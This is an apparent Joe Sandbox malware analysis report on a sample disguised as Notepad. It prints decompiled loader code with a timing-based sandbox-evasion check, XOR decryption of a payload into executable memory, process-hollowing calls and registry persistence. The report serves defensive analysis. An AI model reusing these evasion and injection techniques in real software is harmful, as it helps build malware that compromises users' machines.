__mtinitlocknum 66 API calls 8452->8453 8455 402fe0 8453->8455 8465 405f0d 8454->8465 8462 4030c7 8455->8462 8460 40303d 8478 405e39 8460->8478 8463 405922 __wfsopen 2 API calls 8462->8463 8464 4030cf 8463->8464 8464->7681 8466 405f26 8465->8466 8470 40300b 8465->8470 8467 40573d __filbuf 66 API calls 8466->8467 8466->8470 8468 405f41 8467->8468 8469 407e92 __write 97 API calls 8468->8469 8469->8470 8471 40573d 8470->8471 8472 405749 8471->8472 8473 40575e 8471->8473 8474 40370a __mtinitlocknum 66 API calls 8472->8474 8473->8460 8475 40574e 8474->8475 8476 4036b8 ___strgtold12_l 11 API calls 8475->8476 8477 405759 8476->8477 8477->8460 8479 405e45 __mtinitlocknum 8478->8479 8480 405e4d 8479->8480 8483 405e68 8479->8483 8481 40371d __write 66 API calls 8480->8481 8484 405e52 8481->8484 8482 405e74 8485 40371d __write 66 API calls 8482->8485 8483->8482 8488 405eae 8483->8488 8486 40370a __mtinitlocknum 66 API calls 8484->8486 8487 405e79 8485->8487 8498 405e5a __mtinitlocknum 8486->8498 8490 40370a __mtinitlocknum 66 API calls 8487->8490 8489 409b77 ___lock_fhandle 68 API calls 8488->8489 8491 405eb4 8489->8491 8492 405e81 8490->8492 8493 405ec2 8491->8493 8494 405ed6 8491->8494 8495 4036b8 ___strgtold12_l 11 API calls 8492->8495 8496 405dc4 __lseek_nolock 68 API calls 8493->8496 8497 40370a __mtinitlocknum 66 API calls 8494->8497 8495->8498 8499 405ece 8496->8499 8500 405edb 8497->8500 8498->8455 8520 405f05 8499->8520 8501 40371d __write 66 API calls 8500->8501 8501->8499 8504 402de5 8503->8504 8505 402dfd 8503->8505 8506 40370a __mtinitlocknum 66 API calls 8504->8506 8507 40573d __filbuf 66 API calls 8505->8507 8508 402dea 8506->8508 8509 402e04 8507->8509 8510 4036b8 ___strgtold12_l 11 API calls 8508->8510 8511 405e39 __write 71 API calls 8509->8511 8519 402df5 8510->8519 8512 402e1b 8511->8512 8513 402e8d 8512->8513 8515 402e4d 8512->8515 8512->8519 8514 40370a __mtinitlocknum 66 API calls 8513->8514 8514->8519 8516 405e39 __write 71 API calls 8515->8516 8515->8519 8517 402ee8 8516->8517 8518 405e39 __write 71 API calls 8517->8518 8517->8519 8518->8519 8519->8454 8523 409c16 LeaveCriticalSection 8520->8523 8522 405f0b 8522->8498 8523->8522 8525 405922 __wfsopen 2 API calls 8524->8525 8526 402fc9 8525->8526 8526->7694 8528 402d33 __mtinitlocknum 8527->8528 8529 402d74 8528->8529 8530 402d47 _memset 8528->8530 8532 402d6c __mtinitlocknum 8528->8532 8531 4058af __lock_file 67 API calls 8529->8531 8534 40370a __mtinitlocknum 66 API calls 8530->8534 8533 402d7c 8531->8533 8532->7697 8540 402b6b 8533->8540 8536 402d61 8534->8536 8538 4036b8 ___strgtold12_l 11 API calls 8536->8538 8538->8532 8541 402ba3 8540->8541 8545 402b89 _memset 8540->8545 8554 402dab 8541->8554 8542 402b93 8543 40370a __mtinitlocknum 66 API calls 8542->8543 8553 402b98 8543->8553 8544 402bde 8544->8541 8548 402ce9 _memset 8544->8548 8549 40573d __filbuf 66 API calls 8544->8549 8557 405647 8544->8557 8587 404f6e 8544->8587 8607 405763 8544->8607 8545->8541 8545->8542 8545->8544 8546 4036b8 ___strgtold12_l 11 API calls 8546->8541 8551 40370a __mtinitlocknum 66 API calls 8548->8551 8549->8544 8551->8553 8553->8546 8555 405922 __wfsopen 2 API calls 8554->8555 8556 402db3 8555->8556 8556->8532 8558 405653 __mtinitlocknum 8557->8558 8559 405676 8558->8559 8560 40565b 8558->8560 8561 405682 8559->8561 8567 4056bc 8559->8567 8562 40371d __write 66 API calls 8560->8562 8564 40371d __write 66 API calls 8561->8564 8563 405660 8562->8563 8565 40370a __mtinitlocknum 66 API calls 8563->8565 8566 405687 8564->8566 8577 405668 __mtinitlocknum 8565->8577 8570 40370a __mtinitlocknum 66 API calls 8566->8570 8568 4056c9 8567->8568 8569 4056de 8567->8569 8571 40371d __write 66 API calls 8568->8571 8572 409b77 ___lock_fhandle 68 API calls 8569->8572 8573 40568f 8570->8573 8574 4056ce 8571->8574 8575 4056e4 8572->8575 8580 4036b8 ___strgtold12_l 11 API calls 8573->8580 8576 40370a __mtinitlocknum 66 API calls 8574->8576 8578 4056f2 8575->8578 8579 405706 8575->8579 8576->8573 8577->8544 8581 405090 __read_nolock 76 API calls 8578->8581 8582 40370a __mtinitlocknum 66 API calls 8579->8582 8580->8577 8583 4056fe 8581->8583 8584 40570b 8582->8584 8616 405735 8583->8616 8585 40371d __write 66 API calls 8584->8585 8585->8583 8588 404f90 8587->8588 8589 404f7b 8587->8589 8593 404fc5 8588->8593 8599 404f8b 8588->8599 8620 407f66 8588->8620 8590 40370a __mtinitlocknum 66 API calls 8589->8590 8591 404f80 8590->8591 8592 4036b8 ___strgtold12_l 11 API calls 8591->8592 8592->8599 8595 40573d __filbuf 66 API calls 8593->8595 8596 404fd9 8595->8596 8597 405647 __read 79 API calls 8596->8597 8598 404fe0 8597->8598 8598->8599 8600 40573d __filbuf 66 API calls 8598->8600 8599->8544 8601 405003 8600->8601 8601->8599 8602 40573d __filbuf 66 API calls 8601->8602 8603 40500f 8602->8603 8603->8599 8604 40573d __filbuf 66 API calls 8603->8604 8605 40501c 8604->8605 8606 40573d __filbuf 66 API calls 8605->8606 8606->8599 8610 405774 _memset 8607->8610 8613 405770 _memmove 8607->8613 8608 40577a 8609 40370a __mtinitlocknum 66 API calls 8608->8609 8615 40577f 8609->8615 8610->8608 8611 4057bf 8610->8611 8610->8613 8611->8613 8614 40370a __mtinitlocknum 66 API calls 8611->8614 8612 4036b8 ___strgtold12_l 11 API calls 8612->8613 8613->8544 8614->8615 8615->8612 8619 409c16 LeaveCriticalSection 8616->8619 8618 40573b 8618->8577 8619->8618 8621 408bfa __malloc_crt 66 API calls 8620->8621 8622 407f7b 8621->8622 8622->8593 8638 48005f GetPEB 8623->8638 8625 4808fd 8626 480a98 8625->8626 8627 480aa6 CreateProcessW 8625->8627 8631 481968 11 API calls 8625->8631 8632 480ad0 8625->8632 8634 481b17 11 API calls 8625->8634 8636 480d5a SetThreadContext 8625->8636 8639 4819fd 8625->8639 8648 4817b6 8625->8648 8657 4818b7 8625->8657 8626->7699 8628 480ad5 GetThreadContext 8627->8628 8627->8632 8629 480af5 ReadProcessMemory 8628->8629 8628->8632 8629->8625 8629->8632 8631->8625 8632->8626 8666 481968 8632->8666 8634->8625 8636->8625 8636->8632 8638->8625 8640 481a18 8639->8640 8675 48013e GetPEB 8640->8675 8642 481a39 8643 481af1 8642->8643 8644 481a41 8642->8644 8692 481e43 8643->8692 8677 4815b7 8644->8677 8647 481ad8 8647->8625 8649 4817d1 8648->8649 8650 48013e GetPEB 8649->8650 8651 4817f2 8650->8651 8652 4817fa 8651->8652 8653 481884 8651->8653 8654 4815b7 10 API calls 8652->8654 8702 481e67 8653->8702 8656 48186b 8654->8656 8656->8625 8658 4818d2 8657->8658 8659 48013e GetPEB 8658->8659 8660 4818f3 8659->8660 8661 48193d 8660->8661 8662 4818f7 8660->8662 8705 481e79 8661->8705 8663 4815b7 10 API calls 8662->8663 8665 481932 8663->8665 8665->8625 8667 48197b 8666->8667 8668 48013e GetPEB 8667->8668 8669 48199c 8668->8669 8670 4819a0 8669->8670 8671 4819e6 8669->8671 8672 4815b7 10 API calls 8670->8672 8708 481e31 8671->8708 8674 4819db 8672->8674 8674->8626 8676 480160 8675->8676 8676->8642 8695 48005f GetPEB 8677->8695 8679 481600 8696 480109 GetPEB 8679->8696 8682 48168d 8683 48169e VirtualAlloc 8682->8683 8686 481762 8682->8686 8684 4816b4 ReadFile 8683->8684 8683->8686 8685 4816c9 VirtualAlloc 8684->8685 8684->8686 8685->8686 8689 4816ea 8685->8689 8687 4817ab 8686->8687 8688 4817a0 VirtualFree 8686->8688 8687->8647 8688->8687 8689->8686 8690 481751 FindCloseChangeNotification 8689->8690 8691 481755 VirtualFree 8689->8691 8690->8691 8691->8686 8693 4815b7 10 API calls 8692->8693 8694 481e4d 8693->8694 8694->8647 8695->8679 8697 48011c 8696->8697 8699 480131 CreateFileW 8697->8699 8700 48017b GetPEB 8697->8700 8699->8682 8699->8686 8701 48019f 8700->8701 8701->8697 8703 4815b7 10 API calls 8702->8703 8704 481e71 8703->8704 8704->8656 8706 4815b7 10 API calls 8705->8706 8707 481e83 8706->8707 8707->8665 8709 4815b7 10 API calls 8708->8709 8710 481e3b 8709->8710 8710->8674 8711->7705 8737 48005f GetPEB 8712->8737 8714 480f31 8738 48005f GetPEB 8714->8738 8716 480f44 8739 48005f GetPEB 8716->8739 8718 480f57 8740 480ebf 8718->8740 8720 480f65 8721 480f81 VirtualAllocExNuma 8720->8721 8722 480f8e 8721->8722 8745 480e1f 8722->8745 8752 48005f GetPEB 8725->8752 8727 48066b 8728 480813 CreateFileW 8727->8728 8753 48037c 8727->8753 8728->7708 8728->7711 8733 48085e RegGetValueW 8733->8728 8734 48087b RegOpenKeyExW 8733->8734 8734->8733 8735 480897 RegSetValueExW 8734->8735 8735->8728 8737->8714 8738->8716 8739->8718 8750 48005f GetPEB 8740->8750 8742 480ecf 8743 480ed5 GetSystemInfo 8742->8743 8744 480f00 8743->8744 8744->8720 8751 48005f GetPEB 8745->8751 8747 480e2b 8748 480e4b VirtualAlloc 8747->8748 8749 480e68 8748->8749 8749->7707 8750->8742 8751->8747 8752->8727 8769 48005f GetPEB 8753->8769 8755 4803d6 8756 480401 PathFileExistsW 8755->8756 8757 48041a 8756->8757 8758 48040d CreateDirectoryW 8756->8758 8757->8728 8759 48020a 8757->8759 8758->8757 8770 48005f GetPEB 8759->8770 8761 48026a 8762 4802db PathFileExistsW 8761->8762 8763 4802ec CreateFileW 8762->8763 8768 480309 8762->8768 8764 48030d 8763->8764 8763->8768 8765 480318 VirtualAlloc 8764->8765 8764->8768 8766 48032e ReadFile 8765->8766 8765->8768 8767 48033d FindCloseChangeNotification CreateFileW WriteFile 8766->8767 8766->8768 8767->8768 8768->8728 8768->8733 8769->8755 8770->8761 8772 40152c SetRect lstrcpyW LoadStringW LoadStringW RegOpenKeyW 8771->8772 8772->7721 8772->7722 8774 4010b1 MulDiv 8773->8774 8775 401073 RegQueryValueExW 8773->8775 8774->7766 8776 4010a8 RegCloseKey 8775->8776 8777 40109a 8775->8777 8776->8774 8777->8776 8778->7788 8779->7792 8783 40682f 8780->8783 8782 406996 8784 40683b __mtinitlocknum 8783->8784 8785 40a357 __lock 61 API calls 8784->8785 8786 406842 8785->8786 8788 40686d DecodePointer 8786->8788 8792 4068ec 8786->8792 8789 406884 DecodePointer 8788->8789 8788->8792 8802 406897 8789->8802 8791 406969 __mtinitlocknum 8791->8782 8806 40695a 8792->8806 8795 406951 8796 406717 __mtinitlocknum 3 API calls 8795->8796 8797 40695a 8796->8797 8798 406967 8797->8798 8811 40a27e LeaveCriticalSection 8797->8811 8798->8782 8799 4068ae DecodePointer 8805 4070f9 RtlEncodePointer 8799->8805 8802->8792 8802->8799 8803 4068bd DecodePointer DecodePointer 8802->8803 8804 4070f9 RtlEncodePointer 8802->8804 8803->8802 8804->8802 8805->8802 8807 406960 8806->8807 8808 40693a 8806->8808 8812 40a27e LeaveCriticalSection 8807->8812 8808->8791 8810 40a27e LeaveCriticalSection 8808->8810 8810->8795 8811->8798 8812->8808 9564 4086a9 9567 40a27e LeaveCriticalSection 9564->9567 9566 4086b0 9567->9566 9009 40b0eb 9010 40b0ee 9009->9010 9013 40ecd1 9010->9013 9022 40b166 DecodePointer 9013->9022 9015 40ecd6 9018 40ece1 9015->9018 9023 40b173 9015->9023 9017 40ecf9 9020 406985 _abort 66 API calls 9017->9020 9018->9017 9019 40353d __call_reportfault 8 API calls 9018->9019 9019->9017 9021 40ed03 9020->9021 9022->9015 9031 40b17f __mtinitlocknum 9023->9031 9024 40b1da 9027 40b1bc DecodePointer 9024->9027 9030 40b1e9 9024->9030 9025 40b1a6 9028 407230 __getptd_noexit 66 API calls 9025->9028 9029 40b1ab _siglookup 9027->9029 9028->9029 9034 40b246 9029->9034 9036 406985 _abort 66 API calls 9029->9036 9043 40b1b4 __mtinitlocknum 9029->9043 9032 40370a __mtinitlocknum 66 API calls 9030->9032 9031->9024 9031->9025 9031->9027 9033 40b1a2 9031->9033 9035 40b1ee 9032->9035 9033->9025 9033->9030 9038 40a357 __lock 66 API calls 9034->9038 9040 40b251 9034->9040 9037 4036b8 ___strgtold12_l 11 API calls 9035->9037 9036->9034 9037->9043 9038->9040 9041 40b286 9040->9041 9044 4070f9 RtlEncodePointer 9040->9044 9045 40b2da 9041->9045 9043->9018 9044->9041 9046 40b2e0 9045->9046 9047 40b2e7 9045->9047 9049 40a27e LeaveCriticalSection 9046->9049 9047->9043 9049->9047 8813 4070f9 RtlEncodePointer

                      Control-flow Graph

                      C-Code - Quality: 74%
                      			E00402571(signed long long __fp0, struct HINSTANCE__* _a4, void* _a12, int _a16) {
                      				_Unknown_base(*)()* _v8;
                      				_Unknown_base(*)()* _v12;
                      				_Unknown_base(*)()* _v16;
                      				struct tagMSG _v44;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				struct tagMONITORINFO _v84;
                      				struct _WNDCLASSEXW _v132;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t54;
                      				void* _t55;
                      				struct HINSTANCE__* _t63;
                      				int _t65;
                      				struct HMONITOR__* _t70;
                      				int _t72;
                      				struct HWND__* _t73;
                      				int _t81;
                      				int _t83;
                      				int _t85;
                      				void* _t92;
                      				long _t94;
                      				WCHAR* _t104;
                      				int _t106;
                      				struct HACCEL__* _t107;
                      				long _t108;
                      				intOrPtr _t110;
                      				signed int _t112;
                      				intOrPtr _t114;
                      				int _t117;
                      				void* _t119;
                      				void* _t121;
                      				signed int _t122;
                      				void* _t127;
                      				signed long long _t135;
                      
                      				_t135 = __fp0;
                      				_t104 = L"Kernel32.dll";
                      				_v8 = GetProcAddress(GetModuleHandleW(_t104), "GetTickCount");
                      				_v12 = GetProcAddress(GetModuleHandleW(_t104), "Sleep");
                      				_v16 = GetProcAddress(GetModuleHandleW(_t104), "VirtualAlloc");
                      				_t54 = _v8();
                      				Sleep(0x2be);
                      				_t55 = _v8();
                      				_t131 = _t55 - _t54 - 0x2bc;
                      				if(_t55 - _t54 < 0x2bc) {
                      					L4:
                      					 *0x4151c0 = RegisterWindowMessageW(L"commdlg_FindReplace");
                      					E004031B0(0x415f60, 0, 0x11f4);
                      					 *0x415f60 = _a4;
                      					E004014EC(_t113, _t135);
                      					_t117 = 0x30;
                      					E004031B0( &_v132, 0, _t117);
                      					_t63 =  *0x415f60; // 0x0
                      					_v132.cbSize = _t117;
                      					_v132.lpfnWndProc = E0040232A;
                      					_v132.hInstance = _t63;
                      					_v132.hIcon = LoadIconW(_t63, 0x300);
                      					_t65 = GetSystemMetrics(0x32);
                      					_v132.hIconSm = LoadImageW( *0x415f60, 0x300, 1, GetSystemMetrics(0x31), _t65, 0x8000);
                      					_v132.hCursor = LoadCursorW(0, 0x7f00);
                      					_v132.hbrBackground = 6;
                      					_v132.lpszMenuName = 0x201;
                      					_v132.lpszClassName = L"Notepad";
                      					_t70 = RegisterClassExW( &_v132);
                      					if(_t70 == 0) {
                      						return 0;
                      					}
                      					__imp__MonitorFromRect(0x4151c4, 1);
                      					_v84.cbSize = 0x28;
                      					GetMonitorInfoW(_t70,  &_v84);
                      					_t72 =  *0x4151c4; // 0x0
                      					_t119 =  *0x4151c8; // 0x0
                      					_t110 =  *0x4151d0; // 0x0
                      					_t114 =  *0x4151cc; // 0x0
                      					_t106 = _t72;
                      					_a12 = _t119;
                      					__eflags = _t72 - _v56;
                      					if(_t72 >= _v56) {
                      						L10:
                      						_a12 = 0x80000000;
                      						_t106 = 0x80000000;
                      						L11:
                      						_t73 = CreateWindowExW(0, L"Notepad", L"Notepad", 0xcf0000, _t106, _a12, _t114 - _t72, _t110 - _t119, 0, 0,  *0x415f60, 0);
                      						 *0x415f64 = _t73;
                      						__eflags = _t73;
                      						if(_t73 != 0) {
                      							E00401ABC();
                      							0x400000();
                      							ShowWindow( *0x415f64, _a16);
                      							UpdateWindow( *0x415f64);
                      							DragAcceptFiles( *0x415f64, 1);
                      							E00401F93(GetCommandLineW());
                      							_t107 = LoadAcceleratorsW(_a4, 0x203);
                      							while(1) {
                      								_t81 = GetMessageW( &_v44, 0, 0, 0);
                      								__eflags = _t81;
                      								if(_t81 == 0) {
                      									break;
                      								}
                      								_t83 = IsDialogMessageW( *0x415f68,  &_v44);
                      								__eflags = _t83;
                      								if(_t83 == 0) {
                      									_t85 = TranslateAcceleratorW( *0x415f64, _t107,  &_v44);
                      									__eflags = _t85;
                      									if(_t85 == 0) {
                      										TranslateMessage( &_v44);
                      										DispatchMessageW( &_v44);
                      									}
                      								}
                      							}
                      							return _v44.wParam;
                      						}
                      						0x400000();
                      						ExitProcess(1);
                      					}
                      					__eflags = _t119 - _v52;
                      					if(_t119 >= _v52) {
                      						goto L10;
                      					}
                      					__eflags = _t114 - _v84.rcWork;
                      					if(_t114 < _v84.rcWork) {
                      						goto L10;
                      					}
                      					__eflags = _t110 - _v60;
                      					if(_t110 >= _v60) {
                      						goto L11;
                      					}
                      					goto L10;
                      				}
                      				_t92 = E0040318F(_a12, L"rb"); // executed
                      				_push(2);
                      				_t121 = _t92;
                      				_push(0);
                      				_push(_t121); // executed
                      				E00403055(_t104, _t121, 0, _t131); // executed
                      				_push(_t121); // executed
                      				_t94 = E00402F66(_t104, _t121, 0, _t131); // executed
                      				_push(0);
                      				_push(0);
                      				_push(_t121);
                      				_t108 = _t94; // executed
                      				E00403055(_t108, _t121, 0, _t131); // executed
                      				_a12 = VirtualAlloc(0, _t108, 0x3000, 0x40);
                      				E00402DB5(_t96, _t108, 1, _t121); // executed
                      				_t127 = _t127 + 0x34;
                      				_t112 = 0;
                      				if(_t108 <= 0) {
                      					L3:
                      					_a12();
                      					goto L4;
                      				} else {
                      					goto L2;
                      				}
                      				do {
                      					L2:
                      					_v16 = _a12 + _t112;
                      					asm("cdq");
                      					_t122 = 0xc;
                      					_t113 = _t112 % _t122;
                      					 *_v16 =  *_v16 ^  *("248058040134" + _t112 % _t122);
                      					_t112 = _t112 + 1;
                      				} while (_t112 < _t108);
                      				goto L3;
                      			}









































                      0x00402571
                      0x00402588
                      0x0040259f
                      0x004025ad
                      0x004025b5
                      0x004025b8
                      0x004025c2
                      0x004025c5
                      0x004025cc
                      0x004025d1
                      0x00402643
                      0x00402659
                      0x0040265f
                      0x0040266a
                      0x0040266f
                      0x00402676
                      0x0040267d
                      0x00402682
                      0x00402691
                      0x00402694
                      0x0040269b
                      0x004026b1
                      0x004026b4
                      0x004026d1
                      0x004026da
                      0x004026e1
                      0x004026e8
                      0x004026ef
                      0x004026f6
                      0x004026ff
                      0x00000000
                      0x00402701
                      0x0040270f
                      0x0040271a
                      0x00402721
                      0x00402727
                      0x0040272c
                      0x00402732
                      0x00402738
                      0x0040273e
                      0x00402740
                      0x00402743
                      0x00402746
                      0x00402757
                      0x00402757
                      0x0040275e
                      0x00402763
                      0x00402786
                      0x0040278c
                      0x00402791
                      0x00402793
                      0x004027a2
                      0x004027a7
                      0x004027b5
                      0x004027c1
                      0x004027cf
                      0x004027db
                      0x004027f4
                      0x00402835
                      0x0040283c
                      0x0040283e
                      0x00402840
                      0x00000000
                      0x00000000
                      0x00402802
                      0x00402808
                      0x0040280a
                      0x00402817
                      0x0040281d
                      0x0040281f
                      0x00402825
                      0x0040282f
                      0x0040282f
                      0x0040281f
                      0x0040280a
                      0x00000000
                      0x00402842
                      0x00402795
                      0x0040279c
                      0x0040279c
                      0x00402748
                      0x0040274b
                      0x00000000
                      0x00000000
                      0x0040274d
                      0x00402750
                      0x00000000
                      0x00000000
                      0x00402752
                      0x00402755
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00402755
                      0x004025db
                      0x004025e0
                      0x004025e2
                      0x004025e4
                      0x004025e5
                      0x004025e6
                      0x004025eb
                      0x004025ec
                      0x004025f1
                      0x004025f2
                      0x004025f3
                      0x004025f4
                      0x004025f6
                      0x0040260f
                      0x00402612
                      0x00402617
                      0x0040261a
                      0x0040261e
                      0x00402640
                      0x00402640
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00402620
                      0x00402620
                      0x00402625
                      0x0040262a
                      0x0040262d
                      0x0040262e
                      0x00402639
                      0x0040263b
                      0x0040263c
                      0x00000000

                      APIs
                      • GetModuleHandleW.KERNEL32(Kernel32.dll,GetTickCount), ref: 0040258E
                      • GetProcAddress.KERNEL32(00000000), ref: 00402597
                      • GetModuleHandleW.KERNEL32(Kernel32.dll,Sleep), ref: 004025A2
                      • GetProcAddress.KERNEL32(00000000), ref: 004025A5
                      • GetModuleHandleW.KERNEL32(Kernel32.dll,VirtualAlloc), ref: 004025B0
                      • GetProcAddress.KERNEL32(00000000), ref: 004025B3
                      • Sleep.KERNELBASE(000002BE), ref: 004025C2
                      • _fseek.LIBCMT ref: 004025E6
                      • _fseek.LIBCMT ref: 004025F6
                        • Part of subcall function 00403055: __lock_file.LIBCMT ref: 00403096
                        • Part of subcall function 00403055: __fseek_nolock.LIBCMT ref: 004030A7
                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00402607
                      • __fread_nolock.LIBCMT ref: 00402612
                      • RegisterWindowMessageW.USER32(commdlg_FindReplace), ref: 00402648
                      • _memset.LIBCMT ref: 0040265F
                      • _memset.LIBCMT ref: 0040267D
                      • LoadIconW.USER32(00000000,00000300), ref: 0040269E
                      • GetSystemMetrics.USER32 ref: 004026B4
                      • GetSystemMetrics.USER32 ref: 004026B9
                      • LoadImageW.USER32 ref: 004026C5
                      • LoadCursorW.USER32(00000000,00007F00), ref: 004026D4
                      • RegisterClassExW.USER32 ref: 004026F6
                        • Part of subcall function 0040318F: __wfsopen.LIBCMT ref: 0040319C
                      • MonitorFromRect.USER32(004151C4,00000001), ref: 0040270F
                      • GetMonitorInfoW.USER32 ref: 00402721
                      • CreateWindowExW.USER32 ref: 00402786
                      • ExitProcess.KERNEL32 ref: 0040279C
                      • ShowWindow.USER32(?), ref: 004027B5
                      • UpdateWindow.USER32 ref: 004027C1
                      • DragAcceptFiles.SHELL32(00000001), ref: 004027CF
                      • GetCommandLineW.KERNEL32 ref: 004027D5
                      • LoadAcceleratorsW.USER32 ref: 004027E8
                      • IsDialogMessageW.USER32(?), ref: 00402802
                      • TranslateAcceleratorW.USER32(00000000,?), ref: 00402817
                      • TranslateMessage.USER32(?), ref: 00402825
                      • DispatchMessageW.USER32 ref: 0040282F
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040283C
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: Message$LoadWindow$AddressHandleModuleProc$MetricsMonitorRegisterSystemTranslate_fseek_memset$AcceleratorAcceleratorsAcceptAllocClassCommandCreateCursorDialogDispatchDragExitFilesFromIconImageInfoLineProcessRectShowSleepUpdateVirtual__fread_nolock__fseek_nolock__lock_file__wfsopen
                      • String ID: ($GetTickCount$Kernel32.dll$Notepad$Notepad$Sleep$VirtualAlloc$commdlg_FindReplace
                      • API String ID: 1051210470-2062807747
                      • Opcode ID: c0167c71671bf53e787d6d9d4aae9a93767b5de61ac2528c01b7e0414419f5a9
                      • Instruction ID: 86ed525f5f6418c5d4d27ac436486db8ae60d9136c2ac2c32b89dc552047780a
                      • Opcode Fuzzy Hash: c0167c71671bf53e787d6d9d4aae9a93767b5de61ac2528c01b7e0414419f5a9
                      • Instruction Fuzzy Hash: AE816D71940208BBDB10AFA5DD4DFDE7FB8EB48704F10443AF500A61A1D7B99981CB68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 312 480f9c-4811bf call 48005f call 480f1d call 480073 * 8 334 4811c1 312->334 335 4811c6-4811d9 312->335 336 4815b3-4815b6 334->336 338 4811db 335->338 339 4811e0-48121a call 480422 CreateFileW 335->339 338->336 342 48121c 339->342 343 481221-481250 VirtualAlloc ReadFile 339->343 342->336 344 481252 343->344 345 481257-48126a 343->345 344->336 347 48159a-4815a9 call 4808ef 345->347 348 481270-481595 345->348 351 4815ab-4815ad ExitProcess 347->351
                      Memory Dump Source
                      • Source File: 00000001.00000002.248668647.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_480000_rnixgfly.jbxd
                      Similarity
                      • API ID: AllocNumaVirtual
                      • String ID:
                      • API String ID: 4233825816-0
                      • Opcode ID: 3cb3fd400a46804c8af913efa5707d7a268984d6f9847e7a2593df9bfba607de
                      • Instruction ID: a1281ec260b6c58c5b16d06668ed4f43eea042c48040fa8b22c8ff2e08da3c60
                      • Opcode Fuzzy Hash: 3cb3fd400a46804c8af913efa5707d7a268984d6f9847e7a2593df9bfba607de
                      • Instruction Fuzzy Hash: E722F910D5C3D8ADDB52CBE998117FCBFB09F16601F1844CBE194FA293D23A478A9B25
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 527 480ebf-480f05 call 48005f call 480073 GetSystemInfo 533 480f0e 527->533 534 480f07-480f0a 527->534 535 480f10-480f13 533->535 534->535
                      APIs
                      • GetSystemInfo.KERNELBASE(?), ref: 00480EDC
                      Memory Dump Source
                      • Source File: 00000001.00000002.248668647.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_480000_rnixgfly.jbxd
                      Similarity
                      • API ID: InfoSystem
                      • String ID:
                      • API String ID: 31276548-0
                      • Opcode ID: d69ba95a622c894a4bd645ab8dbcca4bac2886ff4769df9fa958ec880ce194c4
                      • Instruction ID: 1e168db6e0878d3e90c47af3bcfa01028a29ef0934e4e8a357b2954e68a76c07
                      • Opcode Fuzzy Hash: d69ba95a622c894a4bd645ab8dbcca4bac2886ff4769df9fa958ec880ce194c4
                      • Instruction Fuzzy Hash: B7F0A771D2410CABDB98F6B89846AAE77ACDB09200F10896EE706D2240D578C5444769
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      APIs
                      • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,00481E4D,7FAB7E30), ref: 0048167D
                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00481E4D,7FAB7E30,00481B0B,00000000,00000040), ref: 004816A7
                      • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,00481E4D,7FAB7E30,00481B0B,00000000), ref: 004816BE
                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00481E4D,7FAB7E30,00481B0B,00000000,00000040), ref: 004816E0
                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,00481E4D,7FAB7E30,00481B0B,00000000,00000040,?,00000000,0000000E), ref: 00481752
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00481E4D,7FAB7E30,00481B0B,00000000,00000040,?), ref: 0048175D
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00481E4D,7FAB7E30,00481B0B,00000000,00000040,?), ref: 004817A8
                      Memory Dump Source
                      • Source File: 00000001.00000002.248668647.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_480000_rnixgfly.jbxd
                      Similarity
                      • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                      • String ID:
                      • API String ID: 656311269-0
                      • Opcode ID: 41d331edb2c3b9ddb355bffe2ca2eabfd325e98912bd9d1dace312976fb00a54
                      • Instruction ID: 9511cec66e86e410315d655f07e62228eb9561dfbdcd94a832c8ec3a72ea8312
                      • Opcode Fuzzy Hash: 41d331edb2c3b9ddb355bffe2ca2eabfd325e98912bd9d1dace312976fb00a54
                      • Instruction Fuzzy Hash: B5518271E10314ABDB20AFB5DC85BAEB7B8AF05710F10491BF901F7290E77999068B68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 98 48020a-4802e6 call 48005f call 480073 * 8 PathFileExistsW 118 4802ec-480307 CreateFileW 98->118 119 480373-480379 98->119 120 480309-48030b 118->120 121 48030d-480316 118->121 120->119 121->120 123 480318-48032c VirtualAlloc 121->123 123->120 124 48032e-48033b ReadFile 123->124 124->120 125 48033d-480368 FindCloseChangeNotification CreateFileW WriteFile 124->125 126 48036a-48036c 125->126 127 48036d-480371 125->127 126->127 127->119
                      APIs
                      • PathFileExistsW.KERNELBASE(?), ref: 004802E1
